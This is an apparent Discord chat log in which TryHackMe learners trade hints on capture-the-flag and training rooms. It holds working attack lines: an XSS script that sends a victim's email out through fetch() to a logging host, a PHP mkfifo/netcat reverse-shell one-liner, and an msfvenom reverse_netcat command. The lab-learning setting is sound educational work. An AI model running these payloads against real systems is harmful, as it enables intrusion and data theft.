#room-hints

ok

That will take significantly longer

ok

thats my only option though right

You could also go by 10000 steps

Mhm, pretty much

Also true, I always just go to maximum ports after the first 1000, it's preference

p1-10000 after that go with p10001-20000 if the scans taking that long for you

could also look into some alternatives like zmap which are a bit more optimized for speed I think

What timing changes when you use the -T switch?

but been a few years since I used that, maybe for 1 host it's not that different

If you're going for alternatives, go for rustscan

nice, haven't heard of that one yet.

https://nmap.org/book/performance-timing-templates.html

I just know to be careful with fast scanners, wouldn't be the first time I bring down a router while scanning due to filling the state tables

-T0 is called Paranoid, that's a good one, didn't know that xD

Don't use -T5, gives false positives sometimes

nmap -sV machine_IP -vv -p1-1000 -Pn Just ran this and it says

Host is up, received user-set (0.20s latency). All 1000 scanned ports on machine_ip are closed because of 1000 conn-refused

Not sure why it's saying conn-refused, is this some kind of nmap version thing? But try it with 10000 steps and see what the result is

Hello! For Network Services Task 7 last part. I started ||netcat on my own machine and try to run msvenom output on the attack machine, but I do not receive the connection on netcat.||

Can I send you a message in private? 🙂

https://www.exploit-db.com/exploits/21323 do this work?

Anyone taken on VulnNet:Active that doesn't mind pointing me in the general direction of the initial foothold?

hey, anyone completed CMSpit room ?

nope at half

oh damn

can't escalate to root and user

ugh i need some help with that lol

yeah samee

im stick on database flag part

did you complete that ?

got database flag?

did you ?

i didnt

yes

use simple find

ohh

grep -r . | grep "thm{"

this will search the hell and display u

run at /home/user

ohh dont we have to connect to the db :3

im still www-data tho

nope

cd /home/*

if u can simply grep why do u want to connect to database

oh thanks man

just got it

and to get shell

root shell

this might work

but I'm not able to figure out how to compile it

according to my theory it should able to get the root shell

ohh thanks dude ill give it a try : D

ohh nicee

yup

damn this room is so good ngl

learned some new stuff

hahahahahahaa

hehe

complexity is incorrect its easy

hehe eayhh

yeahh

you can do it with gcc right

machne has gcc installed

Yup

But how do u paste it in the machine

I can't able get a interactive shell

you can stabalize the shell first

and then you can use wget to get the exploit ?

Intresting

How to do that

https://github.com/JohnHammond/poor-mans-pentest

this contain the way to do it

its a script but you can do it manually

Network Services room
task 6, enumerating telnet
"Based on the title returned to us, what do we think this port could be used for?"

you might need to run an aggressive nmap scan for this....

after sending that I figured I should do a service scan

all figured out now, or still a bit confused?

Not sure, yet, scan is taking a while

hahaha yeh scan may take a while

it didn't recognize the fingerprint

send a ss

hold on I might've used the wrong switch, trying again

I can't send screenshots here

copy & paste

ah

PORT STATE SERVICE REASON VERSION
8012/tcp open unknown syn-ack ttl 64
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

try run:

sudo nmap ipaddress -sS -p 8012 -sV

it done did the same thing as what I was already doin'

a stealth scan, then a service scan

could you show me a picture of the message rather than words, snipping tool etc

https://imgur.com/ZdqBMY3.png

I got muted for my status, but I'm back

i would leave the -vv out and let the scan run for 5 minutes or so

what's wrong with -vv?

Just gives me more output

i normally run a simple scan like this without it and click space every few minutes to check update %

ah, oki

this happened the first time I did a service scan, btw

Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done

scans can take a while for some reason…

PORT     STATE SERVICE VERSION
8012/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

it happened again

very strange, try restarting the target IP address and running scan again

I'm trying enum again

it stopped after session check

enum isn't working at all

lazyadmin room how long does it take to get the server up? been 20 minsnow. second restart

sigh... forgot to run openvpn

Hi, wondered if anyone could help me? I'm on task 3 on the SQL Injection Lab Room and logged in with the credentials provided but it doesn't show anywhere I can edit the profile. Am I being an idiot? 😅

Hey guys, I just completed day 24 AoC 2020. I am now where I need to fill out a survey form to grab the flag. I completed the survey but it didn't have the flag at the end, it was just a link to fill out the form again :( plz help thanks

Hi , Im having a similar issue with nc -lvp 4444 not doing anything after I send (copy-paste) the payload through the telnet as instructed, did you come right with your issue?

No, I do not know why is not working

from room-help was advised to close everything and try again

I will try, thank you😊

Gave +1 Rep to @last osprey

worked for me , seems its very finicky if the order is wrong or if a step is done more than once

Hi All, I'm stuck on yearoftherabbit. I've gotten Eli's creds.txt but I can't decode the strings in there. Does anyone have a hint or Technic I should be researching? Many thanks

I have not done this room, but have you tried decoding the strings using Base64?

Yeah, it's a very strange string. it looks like this (there a lot more) +++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++

hmm okay, that is strange

I think it morse code but I'm unsure of how change it. I also tried ROT.

could be, but I think morse code uses only - and . characters

I tried replacing but that didn't help either

ok well I looked at the writeups and I know what it is now, but I can't think of a way to give you a hint without giving you the answer lol

it's kind of a troll room

That's really kind. If it a troll/hard then yes, I'll take what ever you can give me. Thanks

Gave +1 Rep to @ivory pewter

ok well I will say that if you look for a sort of "famous" programming language that is created as basically a joke, that will steer you in the right direction

Thanks!!!

I managed to figure it out right before your message!

oh good, I'm glad

It helped to know i was on the right path. Then my brain clicked! Thank you so much for your time!

no problem at all

Hello guys i am stuck at complete beginner
Network services "ENUMERATING TELNET"
Is it just me or nmap scan take longer then 30mins?

Depends on how many ports you are trying to scan, but yes, if you try to scan all ports it's possible.

Adding -T4 to your nmap command might help to speed things up

Also adding -vv will let you see progress

Oh thanks👍 i am scanning all ports thats why

While the scan is running you can even activate the verbose mode by pressing v, so you might see some progress. I would press v 2 times to have verbose mode on lvl 2

Thanks ill try this :)

q all, pls help https://tryhackme.com/room/investigatingwindows3 27q can't find this

can someone give me a hint Q4 simpleCTF already have root

U mean this question right

To what kind of vulnerability is the application vulnerable?

yes pls

ah already got it /|

Nice 🙂

How can I copy a file from a remote SMB server to my local linux machine using smbclient?

I tried everything but I can't copy one damn file lol

You can get the file. (:

already done it

doesn't work

What's the command?

get [local name] [remote name]

get <file>

what?

use that

no local remote thing

get file_name

just get <remote file>

Basically, I accessed an SMB server by an Anonymous account so to log into the main server with SSH I have to send the keys from the SMB server to my local linux machine

So I don't have to get the file

but rather send it

oh

put <local file>

you might have to delete the old one first though

I can't even send a screenshot

what do you mean?

!docs verify

wait

are you trying to get the ssh keys on the smb server

or put your own

YES!

That's it

then do get id_rsa

on the SMB server?

yes

and then on your ssh command add -i <path to id_rsa>

you might need to chmod 600 it though

I'm so fucking dumb

I'm sorry

You're right

lol no problem

thank you man

I appreciate it

I tried with this command but didn't work smbclient //server/share -c 'cd c:/remote/path ; put local-file'

it says that the file doesn't exist

even tho it was right there

waitwhat

just do smbclient //server/share

then cd .ssh

and get id_rsa

yeah yeah that's what I've just done

But I executed that command before you told me to execute the simple get command

what a waste of time lol

ah

So I'm on the vulnversity room, trying to get the php reverse shell to call back out to me and I don't get a netcat session when I execute the shell. I went into the .phtml file and changed the callback IP to my tun0 from an ifconfig.

Any help is appreciated!

do you have a listening socket open? how did you open it?

@cursive cairn I believe so, I've got the nc -lvnp 1234 port listening, and I tried running two ways, 1 going through the uploads page and clicking on the file and 2 just going directly to the named link i.e. ||/internal/uploads/shell.phtml/||

@cursive cairn could it be something with my vm setup? I don't think I put any restrictions on it when I set it up though.

are you using the attack box? if not and you're using an external VM make sure you have the OVPN connection made from inside the vm. that's the issue i had atleast.

this is a real pasic help question,

basic*

the question is this
Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)

ok

did you look at the find manpage

i did, i was scanning for SUID at all, i have a vague understanding of that in itself, perhaps i should do another dive into the man

the SUID permission is the part im having difficulty finding

-perm is the option you want

gotcha, so -perm without any other prefix or specfication looks for "SUID"?

no

-perm /<permission>

the command you are looking for is something like this for SUID find <directory> -perm /4000

doing -perm without anything else satisified the question apparently.

thanks for the help everyone

👍

hey

the ssh session to linux privesc room seems to be a littile bit unstable

Hi guys, im a bit stuck on Owasp top 10. In the question How many non-root/non-service/non-daemon users are there?

My two approaches have been using ps -ef and cat /etc/passwd but the output confuses me. Especially identifying if a user is a service

i believe everyone displayed in /etc/passwd is a root/service/daemon user

so the answer is 0

wow, really? Ive misunderstood that part then 🙂

i didn't know either hahah, bit of research explained it all to me

+1 all the users listed in /etc/passwd are either root, service or daemon

Hello guys, i'm having problems with the nmap room practical section

with the xmas scan

sudo nmap -p-999 -sX -Pn -vv 10.10.191.78
i ran this command because the host doesn't respond to ICMP but i get that all 999 ports are closed

"how many ports are shown to be open or filtered?" the answer is clearly a three cypher number

did i do something wrong?

Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed. So i guess you have the answer

Oh...was it that easy i'm so stupid

dont beat yourself too hard

have fun

it just a game

i think the room was created with an older version of nmap that said open|filtered because of no-responses instead of closed because of resets

Thanks for the help ❤️

I guess. Its 276 days old

Cheers, glhf

I'm using the openvpn and I'm fairly certain that was on while all of this was happening but I'll double check today.

i have the connection made from outside the vm and it works

I have repeated that phrase "I'm so stupid" at least 100 times going through these rooms. 🙂

We as pentesters/analysts tend to naturally overthink things. I've missed really obvious/easy answers because I overthink A LOT!

You are not stupid my friend! You are here with the rest of us learning and mastering our craft!

Here's to always getting better and moving forward!

Hi hash anyone crack sesh birthday ctf https://tryhackme.com/room/seshbirthday
the killswitch? BONUS POINTS: Did you crack the killswitch? Enter the flag:

Some of the good things I heard today. Thankyou💙

We are all getting better together on this amazing journey! Proud to be a part of this community. 🤘 Cheers!

Indeed 😄

do an apt update

then apt install python3

how use in using Sudo a apt update

what?

alright

yeah do a sudo apt update

I have already installed install Python 3

alright

sudo pip3 install pyqt5

that's what I've done but its give me that error

there is no sudo in the image

sudo apt-get install python3-pyqt5

try doing this

Ok

tell me if it works

what are you think the reson fir this error

does it work

no my kali linux is still booting

misconfiguration

alright

always we need to move this conversation to #room-help this is the hints chanel

Hi i'm currently in the Network service room/ Task 4 Exploiting SMB. One of the questions is asking me if I can get anonymous access. My command is "smbclient //10.10.155.164/profiles -U Anonymous" but I get the error NT_STATUS_HOST_UNREACHABLE. does anyone know what i'm missing here

What rooms need to be completed to get the Pentester Tools badge?

Anyone know if the network services 2 room is working - it looks like there might be a syntax error in the bash file - think I have the permissions set properly

That's the message I get when I try and run the bash file

LOL nvm I think I downloaded the webpage not the file

You can try to click on "enroll" and see which room you can do

Thank you. I never did find a link to the series but the only room I don't have is Nessus which I just joined. Thanks for you assistance.

Gave +1 Rep to @spice shard

Anyone have completed Avengers room ?

Does anyone know if for the SMTP exploitation section of NS2 there is a further thing to find after the flag?
I've found multiple users for the host, with all pointing towards something, but I don't know if there's a way to leverage it for priv-esc.

#room-hints Hey guys, I am currently working on the Netowrking services Enumerating telnet, and the last two submit questions I cant figure out. I feel like I am missing a switch or something of the sort.

Who could it belong to? Gathering possible usernames is an important step in enumeration.

check nmap scan output for the answer

also, check if you have full scanned target machine

and the question after this one doesn't require any answers

Yeah I checked it i saw admin, krbtgt, administrator wonder if the switch im using is wrong. I used nmap -vv -T4 -p 0-65535 10.10.250.196 @jolly adder

@jolly adder Im re-running the scan I gave up at about 1 am last night so I am going to check it again this morning see if I missed something.

yeah that last question I dont need help with just the two submit questions

add -A flag too

shit thats what I forgot!

okay I'm looking at the other one too now wait

Thank you because that does the username and os detection correct?

for the last one, check the title, your answer lies there

As I remember, yes, it should scan for usernames too.

👍 💯

re-running some of the commands, thank you for your help that is much appreciated!

-sS --script-smb-enum-users add this too I found it on the internet

I wasn't sure cuz i haven't worked with enumerating users section for a while and I have completed that room long time ago

no problem 🙂

Yeah I am just getting started I just did my fisrt enumeration like two days ago. Man if feels so good when you get the flags.

yea it does : D

@jolly adder its a different type of high thats for sure

?

@jolly adder okay this is what I am running nmap -vv -T4 -p 0-65535 -A -sS (thenattheip)

okay

how much time left till nmap finishes

36.33% it will be bit

it's going fast

when I'm running nmap I'm usually waiting over 45 min

D:

Usually takes about 5 minutes im at 41% now

Dang 45 minutes thats insane

41% will be enough if you dont have battery problems

yea that is

i need to buy a new lapop -_-

Yeah I got a think pad and I love it

lenovo?

got it about a year ago

yep

It replaced my surface pro three that I got in like 2013 lol

i have legion and it's jut not working normally

How old is the legion?

2013? 😄

2 years old

Oh thats new!

whats going on with it battery life and that is all?

i had toshiba from 2007 before my legion 0_0

battery life is okay but i have problems with my hdd

RIP bad sectors?

im currently saving for ssd

yep

a lot of them

Damn yeah ssd is the way to go for sure

yeah

Yeah bad drive causes so many issues

btw you can verify youself for showing your level and eveything in this group

atleast thats all it is though thats pretty cheap to replace if you do need to get another hdd

it sure does

what do you mean verfiy myself?

it takes 15 minutes to boot -_-

JEEZ!

I would give up at that point and just go to sleep shows dedication on your end!

yep

im at 67 %

see i got my level as a role

you can have too

😄

OH I got you

i'm used to it now

nice

So how do I go about assigning myself these roles thought an admin had to do that? Does the bot assign the role im guessing?

You gotta verify yourself. Follow this link and get verified.

!docs verify

Boom thank you

I am a noob lol

We always learn :)

• : )

also

@tough rapids facts, and I for sure lover learning new things, thats exactly why I joined this discord. So that I could be around like minded people as yourself.

level 6 is not that bad

You got this (:

Thanks! @spice shard 🙂

Gave +1 Rep to @spice shard

@jolly adder Woot I got the user it was skity I dont know why I didnt see that last nigth it was blasted everywhere lol

lol

these things happen

WOOT

and i got the other one

: D

nice

God I cant believe I was looking at it the whole time!

you will get used to it

by time you will find answers very quickly

Yeah I have been knocking them at I have always been getting stuck on the last two everytime

Whats funny both times I had the answer I just didnt know where to look for it in the file.

or the returned results I mean

the -sS was what I needed as well! That was clutch I was missing that switch I knew I was missing something.

Those things happens to everyone who is new 🙂

Hey guys, I' am having some trouble getting a reverse shell in Telnet using the mkfifo payload - Network Services room, Task 7
I have netcat listening on port 4444 listening locally, but when I run the payload in the telnet session to the target machine, I get no response from netcat.
Can someone please give me a push in the right direction?
I've been at this one for awhile now and hit a bit of a brick wall.

What room is this for?@idle vapor

Try other payloads...

What's the exact payload you are trying to run in the telnet session?

check your script

Hey, guys!Could anyone help me with a tip for the super-spam room?

#873296260520640602 there is a special channel for it 😄

Hi everyone. Need help on Overpass2-hacked room. I've already completed all of the questions except "what payload did the attacker use to gain access"

I think I know the right answer, but I just can't get it right. The first set is 8 characters? yet the payload only starts with <?php

the hint says to include the php tags. all the writeups that I have seen has the same answer as I do, but I just can't get it right for some reason. Please help!

Hi guys ...can anyone please help me about "That's the ticket" room. I think I am injecting the correct payload inside the Message textarea but it seems that there is something wrong with room or THM networking because room machine is unable to send request to the HTTP / DNS request catcher..
Payload

 </textarea>
<script>
var email1=document.getElementById('email').innerHTML;
var email2=email1.replace('@','at');
var email3=email2.replace('.','dot');
fetch('http://'+email3+'.b91c9a9edc5062e515d17cac8de12b09.log.tryhackme.tech');
</script>

But I am facing following error from the inspect element (console tab) of browser

2:51 GET http://hamzaxtestycom.38dfc9c03535989591aa46d0e67710d4.log.tryhackme.tech/ net::ERR_NAME_NOT_RESOLVED
(anonymous) @ 2:51
2:1 Uncaught (in promise) TypeError: Failed to fetch

anyone please?

All good I just re-tried it tonight and it worked for some reason 🤷‍♂️
I did close and re-try on another terminal window last night, not sure what happened. Might have been how I was copying/pasting the payload last night.
Thank you for reaching out 🙏

Gave +1 Rep to @left thunder

I managed to get it working tonight, not sure how.
Thank you for reaching out 🙏

glad it worked 🙂

anyone did Chronicle ?

hey , Ive been doing KoTH Food and I got root and found 6 flags on the system, can anyone give me a nudge or can I pm him my flags so I know what's missing ? ty ^^

currently working on it.

Hey, I am currently working on the Web Fundamentals room and I am on task 5. I was able to do the GET request no problem but I am having some trouble with the POST request. I have done my own research and tried everything I could think of and can't figure it out. Could someone help point me in the right direction to figure out what is wrong with this? ||curl -X POST -d "flag_please" http://10.10.119.212:8081/ctf/post||

oop, nothing was wrong with it, I must have just been mistyping it in the terminal or something

I'm on it but currently stuck

Let me know if you need any help @keen maple @clever root @marble pawn

I can't get my openvpn configuration file from tryhackme access adress. When o click the download button, its redirect me to 404 error page. Anyone can help?

Reselect the server you want, regenerate the config file, wait 3+ minutes before downloading it.

Is waiting a important step? Because i changed server but it doesnt work

Yes it is

Okay, i will try now

@left thunder thank u so much bro, i almost went crazy

Gave +1 Rep to @left thunder

yeah samee

oh hey can i dm you ?

Hey, one of the questions in the "Network Services" -> Task 3 doesn't seem to be accepting the answer (What ports is SMB running on? ) wondering if it's a bug?

I'll check it in just a sec

Thanks!

it should work

Gave +1 Rep to @dry gate

there are two ports open to do with smb

ahh maybe didn't scan over 1k+ ports

which ports do you get open?

22/445 and another one but don't have the box open anymore

I'll try again later thanks!

ok :)

Feel free to ping me if you want to double-check something ^^

Thanks, got it. The / in the tip threw me off. Should have checked the question in more detail 🙂

Gave +1 Rep to @dry gate

any hints on chronicle yet i can't seem to find the api key?

Any hints on IntroPoCScripting?

I am stuck on task 3, question 5

||Did you take a look to the .git folder||

Hi everyone. Need help on Overpass2-hacked room. I've already completed all of the questions except "what payload did the attacker use to gain access"
I think I know the right answer, but I just can't get it right. The first set is 8 characters? yet the payload only starts with <?php
the hint says to include the php tags. all the writeups that I have seen has the same answer as I do, but I just can't get it right for some reason. Please help!

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

oh. but it is the IP address from the task file.

in any case, i'll try it out. Thanks for the tip!

I got this. but i couldn't create the /api/uname.

i tried, but didn't work either.

Have you setup listener in port 4242

in overpass2-hacked, the first part is just analysis of the pcap file. https://tryhackme.com/room/overpass2hacked - I just downloaded the pcap file, analyzed it. found the payload, but i can't seem to get the answer right. - I've also checked the writeups about it. I seem to get the right answer, as it is the same as with the write ups. but when I enter the answer, it is not accepting it. 😦

Apologies, I thought you are going to setup revshell

Well, I haven't finished the room completely. And is it for question 2? Mine didn't start with <?php

yes. it's for question 2. does your answer finish with the bracket ) or the greater than sign?

I tried to remove the <?php tag. it didn't work either.

Try to CTRL+F5 and enter the answer again if you are sure that's the right one. Maybe that helps. Tried it right now and it works just fine.

https://tenor.com/view/it-worked-abish-mathew-son-of-abish-shocked-unexpected-gif-16907454

the refresh and clearing the cache helped. LOL! thanks so much.

fuzz directories. you may need to use multiple wordlists. do this on all hosts. use recursion too. ffuf will be your friend.

Which room should i join after the simplectf room? I want a easy room

You can navigate to Learn -> All Rooms and then you can play with the filters. Set the difficulty to easy.

What is the port? And why we scan ports with nmap?

Ports are essentially where network traffic flows in and out of our machines and we use nmap to figure which of these ports are open and susceptible to attacks. Task 5 in this room talks about ports if you want to learn more https://tryhackme.com/room/packetsframes

Starting down the Pre Security learning path may also be beneficial for learning some of the fundamental networking concepts

not finding that location on either web site

I've ran ffuf,wfuzz,gobuster, and feroxbuster using common.txt,big.txt,raft-small-words.txt subdomains-top1million-xx.txt, discovery-list-2.3-xx.txt not finding a way to get the api key

you found ||/old|| i guess, so fuzz from there too and youll find another dir

fuzz recursively

yes

well youll find the dir then if you use the right wordlists. i think 2.3 medium finds it. im not sure. ive put lots of lists togehter @pure thistle

hello, just started Psycho Break room and the ||map.html|| is a 404 ? is it a bug or on purpose ? Thx

I've used several different word list but not finding anything that will help me locate the api key

you need to look at how to pull back the ||git files||

i think i know how to do that problem is i dont have the repo to do it

you found ||.git|| right? it sounds a harsh thing to say, but if you haventy found much then its just researching, and try harder.

go look at git on hacktricks

maybe search for git tools

'gittools' an d 'gitdumper' on github

ive found the commit hash but cant do anything with it because i dont have the repo it is in

ive told you what you need to do above - git tools

look at what you can do with git. hacktricks may have something that could help you

oh well guess i need to wait for the write ups to come because nothing i do seems to work ugggg

Keep at it. You’ve got this. You know what to do - I suggested tools above which you need ||gitdumper||, and this will help you. No problem for the help by the way 😉

@potent quail how do you write with the black highlights? its so cool!

did you finished it ? i cant find the master password

Hi guys, I am doing the OWASP juice shop room, but im unsure how the ||nullbyte|| works, it says ||they set it to %2500 to encode for html instead of just %00, why? wouldn't it be %25%00 or 25%00? ||

actually would it be better if I just google html encoding

I need a hint for the hololive room

You can ask the same question in #holo-network

Ok

It’s with | but twice. So pipe pipe TEXT HERE PIPE PIPE.

did anyone finish chronicle who can help me with the buffer overflow please? im aware its a ret2libc attack due to NX being enabled, but keep getting illegal instruction for binsh and not sure what to do

%25 encodes the % sign

It's a double encoding

hey guys any hints for the chronicle room dont know how to get the api key

Hello Guys! Pls any hints on "inacave" room (You're in a cave).
I'm stuck when i tried to use my deserialization payload, but its didn't work for me. I used jdk 1.8.0_251

@near shoal I know, that u had the same problem. Did you finish it?

I had to find the right jdk to get it to work. . . don't remember right now which it was 1 sec

yeh, can't find it right now

can I DM

&

?

not available atm sorry

no problem thx

Hello everyone, I'm just working through the OSQuery stuff, and I'm up to task 8. "One of the users performed a 'Binary Padding' Attack. What was the target file in the attack? I tried to list the yara_events and file_events but i get error message. I'm stuck I would appreciate if someone can help

Hello i need help i am stuck in OWASP Top 10 from complete beginner path at module 8 Insecure Deserialization - Code Execution

i am not able to get reverse shell i follow same steps as show in instruction

Are you on a VM/own machine or the attackbox?

i was using attack box
actually i enter wrong if in code thats why i was not geeting reverse shell

thanks @left thunder

Gave +1 Rep to @left thunder

Hehe I've just gotten onto Insecure Deserialisation

Hey everyone. I'm attempting to work through the Enumerating NFS section of Networking 2. I am able to mount the /home share and am able to cd into the cappucino folder but I am not able to see any files. Based on the material there should be files in this folder. Any ideas on why there are no files? I am using the attack box.

Never mind. It appears as though all of the files in the directory are hidden. I just needed to use the -al to see them.

Good work dude!

Thanks 😄

Gave +1 Rep to @random furnace

awesome stuff :)

for those who finished GameBuzz, can I get a nudge on the second part?

Too early. It is a hard box. Challenge yourself. 🙂

Been working on it for hours, going to start again tomorrow.

I got stuck too

Hi! Can someone help me with Walking an Application Room? I'm just missing one question 😦

Hello I am in the Kerberos room on task 2 , in this question...Kerbrute Installation -

1.) Download a precompiled binary for your OS - https://github.com/ropnop/kerbrute/releases

shit

I am using the kali vm provided in thm to download the githib file for use? ^^^^^^^

Mist be real hard then

I'd like to help, but Rule 13. (though I'm not sure if this applies to walkthroughs, or just challenge rooms) Check back in a couple of days. You might even get it by yourself by then. 😀 Good luck!

That's a walkthrough no?

Should be fine

Rule 13 is more for challenge rooms

What is the name of the role who's job is to identify attacks against an organisation

I think I am also facing the same issue. I can't see the flag inside HTML as comment anywhere. The first line is a normal comment and not a flag. Did u get any solution?

The question is : "What is the flag from the HTML comment?"

The flag isn't in the comment per se, rather the way you can find the flag is...

Im assuming im not breaking rule 13 here as it isn't a challenge room. If I am feel free to delete

What is Rule 13? :o I can't seem to find anything that makes sense when I look it up

No hints for new challenge rooms, for at least the first 72 hours. It's to keep them competitive

aaah okok. Thank you :D

Gave +1 Rep to @supple warren

Anytime 🙂

Hey I need help with the base 2 question goin crazy

what's the problem?

I can count to 2 so hopefully I can help with base2

Is it a certain way u have put it in decimals

So hard it wasn’t possible, last night 😂

Oof

I don't really understand the question, what room and question are you working on?

Wasn't the one who tested that...

So normally we count with base 10, aka decimal. add 6 symbols and we get hexadecimal or base 16

Those who finished it, had the last part saved from the previous CTF. It’s fixed now, I’ll try and finish it today ❤️🙏

Base 8 has 8 possible symbols

Base 0 has nothing

Base 0 isn't particularly useful though

Base day has

so you put them together, and you have nothing

Truth ^

well, if you multiply them at least

Maybe a 0day

0day = Null

nothingDay

Bully

So you dont exist, thought as much

I'm sure this person is even more confused now

thanks team

haha

Lol I’m sorry, just woke up.

Yeah that wasn't helpful sorry

All bases are belong to us. That’s all they need to know

Base 2 is known by another name

There's the hint

By convention we use 0 and 1 as the symbols

Thanks everyone very helpful info

I didn't even understand the question but hopefully noting that I could count to 2 helped somehow

because I can't go much further

Naw I know which question it is

Gosh! It is well said to leave such problems for a while and come back to it. Till now I had been doing the same thing but instead of viewing the page, I was looking at the new "view-source" page. Thanks @supple warren

Gave +1 Rep to @supple warren

Anyone here done with chronicle room need hint decrypt ||f**fx password||

can anyone help me with SQHell

Could someone give me a hint on how to get usernames in chronicle room?

Hi all - got a couple of rooms that I'm utterly stuck on:

1. Poison - I've noted that the search allows local file access, but am utterly stuck on how to move forward with it.
2. OhSINT - managed it all without too much bother, with the exception of the final question - "What is this persons Dob?". Part of me thinks steghide would be the way to go, but I'll be stuffed if I can work it out!
   Any nudges, pointers or even ridicule would be happily accepted at this point!

Me too, || found a lot for xxx3 files but nothing for xxx4, || did you?

gamebuzz?

Oh my Gosh, KING MINOS is the best)

I dont get this question

what does it even mean

I guess it wants you to try guess what the process ID would come after 300

given similar/same process

I don't know what room that is but given the type of question I imagine the answer is probably in text above it

Yeah, the process after 300... || 301 I'd assume ||

aand this?

Which room is this?

linux 3

You have to find the process which is running on the deployed instance. Should you look at hint?

Please What is the code break Ben.Spring bookface account

Hey guys I am currently doing final exam on the cc pentesting room. I ran nmap||found that two ports are open ssh and http|| then ran nikto found some 4 vulnerabilites||---i am thinking that i should form an XSS attack|| am i in the right path? like what should i do with this info?

any other enumeration beside nmap and nikto? like gobuster for example

yah am actually running gobuster on the url still its running ||wordlist i provided is rockyou||

umm, rockyou?

i think its a bit heavy

rockyou is worldlist for password brute force, good sir

yes i understand that but it doesnt run without any wordlist

for the dir command

there is a perfect wordlist for gobuster in /usr/share/wordlist

yah just saw that the server is apache ||so i guess it should be apache user enum 1 or 2 ||

i will just try that

let me/us know if you need more hint, good sir

glhf

+1

Hello Everyone, I am working on S3BOTS2 (Splunk 2), Task 5, Question 2. I am using this search query (index="botsv2" host="MACLORY-AIR13" sourcetype=ps *.crypt_) but I cannot seem to located the Game of Thrones episode. I tried adding every known video extension know to man (well...this man, anyway). The answer is supposed to obvious, but evidently, not to me. Any nudge in the right direction is much appreciated, thanks.

i think its not allowed due to rule13, can an admin say if it applies cause that room is a walkthough one not a challenge room

i think i need a little more hint nothing worked for gobuster or i am doing something wrong...its just square one again......i guess none of sqli would work since there are no forms involved.

ok share the gobuster command

gobuster -dir -u <ip> -w path to the wordlist [||tried with apache-user-enum.1.0 and 2.0 and the directory list 1.0 and 2.3||]

try to use || common.txt|| and observe the status code when running the command

its either in ||dirb/common.txt|| or ||dirbuster/common.txt||. cant remember

Thnx for the hint and pardon me for the late reply was just involved?!||I got nyan : some mess am i in the right path?||

as in credential?

if so then yes

i made a sin...i just peeked at the next step from a walkthrough....😢. But thnx guys

hi - I think I'm at the same point - illegal instruction. Did you manage to solve it? I really suck at this kind of things 😦

I did manage to finish yes. Honestly I read a writeup as my BOF sucks. I can do basic but ret2libc if something goes wrong I have no idea how to fix it

I couldn’t get standard ret2libc to work. I had to use a ROP gadget

@potent quail I surely suck more 🙂 Do you mind sharing the writeup? Didn't manage to find one...

never mind ... managed to find one .... there is something never seen in other basic tutorials

but im not sure what port is rhost and wich is lhost... i tried both and its still not working after setting up all they asked for

talking about Metasploit?

hey, I'm doing Relevant room, but got stuck after obtaining two usernames/passwords. I'm not sure where to look at next. Any hint (not a solution 🙂 ) would be highly appreciated!

I need help with room "ZTH: Obscure Web Vulns" Task 14

This is the task with the JWT tokens where you have to change the token form RS256 to HS256 and recompute the signature from the /public.pem on the server.

I seem to have figured out everything with the encoding and decoding parts, but it doesn't really specify what other changes need to happen for the server. Do I need to change the payload to "data": { "hello": "world" }" like mentioned in the tutorial, or change it to "admin":true or something like on PayloadAllTheThings? I have made sure to maintain the "iat" and "exp" timestamps from the generated JWTs, so that shouldn't be it.

Also do I need to hit "Get new JWTs" every time I enter it wrong? ',: /

Need a hint on "Blog". I was able to get a shell as www-data but i cannot find the user.txt flag anywhere and im stuck on priv esc

Is it normal that 3389 is the wrong answer? 'cause I run nmap to scan all the ports and only 3 are open but when I entered 3389 to the question, it says that's not correct

this is weird tho

Maybe restart the room, wait 5 mins and then do an nmap scan.

Sometimes the services take a bit to start up.

Also 3306 is correct because that's the default port for MySQL.

Service was probably not completely up at that point, it can take around 5 minutes are so to fully boot

I need help with the room "Network Services" I am stuck creating a reverse shell in Task 7 "Exploiting Telnet"

From my attack box I connect to the remote telnet server on port 8012. I started the nc listening port on my attack box with the command "nc -lvp 4444" then on the remote telnet server i type:

.RUN msfvenom -p cmd/unix/reverse_netcat lhost=10.10.182.111 lport=4444 R

But I do not see anything happening. lhost is the IP of my attack box. Does anyone have a hint for me?

So I'm tryna ping [local THM ip] through telnet while on ovpn. But I get nothing. What do?

For the Blue room the Payload that i found and is the correct answer for the room is not working and spitting out a bunch of errors anyway to find a payload that does work and open a meterpreter shell?

Remote machine probably doesn't have msfvenom

You're listening to ICMP properly?

Dunno. I guess?

It can take a few tries iirc

You're pinging your VPN IP?

I'm pinging [local THM ip], which is my IP, since I use ovpn.

Don't include the brackets

Do include .RUN

Tried that. It works very inconsistently. It worked one time, yesterday, on the box. But since then nothing.

It's a bit finicky, especially if you muck up the command

I'm redoing Network Services: Exploiting SMB. I'm using the attackbox btw. I downloaded the samba RCE exploit mentioned to see if I could actually get it to work (I know it's not what the exercise wants) but I'm running into a few problems that I'm not sure entirely how to get past.

thanks in advance c:

Looks like it's missing a module

Don't remember requiring a script for that room though

Doublecheck the options on the share

It's not part of the exercise but it does mention that a possible exploit is some sort of remote code execution script and that's the one it mentions. I just wanted to see if it would work 😅

Ah ok

Upload vulnerabilites Task 4. Photo uploaded, name changed. Can't get the flag though. Wondering if I'm renaming in the wrong place?

So there's a missing line in MetaSploit exploit where it should return user name. What's going down?

am i supposed to be stuck in /bin on the "CC: Pen Testing" task 10 room?

nevermind it just worked finally after restarting msfconsole

Hello, can I have a hint on the password of local account for Pickle Rick challenge question #2 please?
(can share what I got so far in pm)

I've been at this GoldenEye challenge most of the day. Seems like I'm just not having any luck with my wordlists. Using what is included in SecLists

Sure, you can post what you got.

@spice shard Should I post it here?

Yeah you can.

Though you don't need to find password, but you can use other commands (which will not get filtered) and then read the stuffs on the console itself.@quick grove

@spice shard will have a look, thanks

Gave +1 Rep to @spice shard

hey, what is the status of the tickets for the blog posts from the PreSecurity path? Did my post got ovelooked? anyone got the tickets already?

